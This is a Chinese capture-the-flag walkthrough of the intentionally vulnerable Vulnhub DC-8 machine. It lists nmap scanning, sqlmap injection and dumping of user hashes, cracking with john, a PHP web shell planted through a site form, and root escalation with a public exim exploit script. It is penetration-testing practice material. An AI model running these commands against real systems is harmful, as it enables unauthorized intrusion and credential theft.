Vulnhub靶机DC系列-DC8

Delina

原文链接：Vulnhub靶机DC系列-DC8
​
DC-8
???? https://www.five86.com/download/DC-8.zip

---

参考：

​

翻译：                                  描述                         Dc-8是另一个故意建造的易受攻击的实验室，目的是在渗透测试领域积累经验。                         这个挑战是一个实际的挑战，也是一个“概念验证”，即在 Linux 上安装和配置双因素身份验证是否可以防止 Linux 服务器被利用。                         这一挑战的“概念验证”部分最终由于 Twitter 上的一个关于双因素身份验证和 Linux 的问题，以及@theart42的一个建议而产生。                         这个挑战的最终目标是绕过双因素身份验证，获得 root 并读取唯一的标志。                         您可能甚至不知道安装和配置了双因素身份验证，除非您尝试通过 SSH 登录，但它肯定在那里，并且正在完成它的工作。                         必须具备 Linux 技能并熟悉 Linux 命令行，同样必须具备一些基本渗透测试工具的经验。                         对于初学者来说，Google 可以提供很大的帮助，但是你可以通过 twitter@dcau7来帮助你重新开始。但是请注意: 我不会给你答案，相反，我会给你一个关于如何前进的想法。

这把找到的线索只有后面提交的php马要随意附加一段文本，不然shell可能弹不了

• 
  

arp-scan -l

​

• 
  

nmap -sV -A -T4 -p- 192.168.237.133

​

网站指纹识别

​

访问HTTP

​

访问里面的内容可以发现

​

​

​

​

​

​

​

它们对应的是不同的id页面，与数据库有关系
​​

​

可以看到报错了

• 
  

sqlmap http://192.168.237.133/?nid=3 --dbs

​

先来简单爆表

• 
  

sqlmap http://192.168.237.133/?nid=3 -D d7db --tables

​

​

直接爆到底

• 
  

sqlmap http://192.168.237.133/?nid=3 -D d7db -T users --dump

​

把admin和john的pass写进一个文档，然后用john搅一下

​

• 
  

john rock.txt

​

• 
  

john:turtle
​
后台登陆
​
想添加页面执行php的办法但是编辑器不配合，逛了半天
​
找到编辑并且可以提交的
​

​

在上面写个????，然后保存，记得要把随机文本也写进去，不然会弹不出shell

​

getshell
​

• 
  

python -c "import pty;pty.spawn('/bin/bash');"

​

查找特殊可执行文件

• 
  

find / -perm -u=s -type f 2>/dev/null   

​

查询exim的版本

• 
  

/usr/sbin/exim --version

​

• 
  

searchsploit exim

​

把该脚本拿到当前目录

• 
  

cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./
​​
之后开启服务让目标机去下载并执行

• 
  

service apache2 start

​

well，探到下载了，但是没有权限，所以得换个地方
​
​
最终在/tmp目录可以下载进去
来查看一下脚本的具体使用

​

• 
  

1. 1、./46996.sh -m setuid 返回一个shell
   
2. 2、./46996.sh -m netcat  利用上面的shell再去执行-m netcat我才能提权
   
3. chmod 777 46996.sh
   
4. ./46996.sh -m netchat

复制代码

​

have a nice day ????

​

总结：
1、SQLmap
2、Exim（Mail Transfer Agent，邮件传输代理）服务器软件
​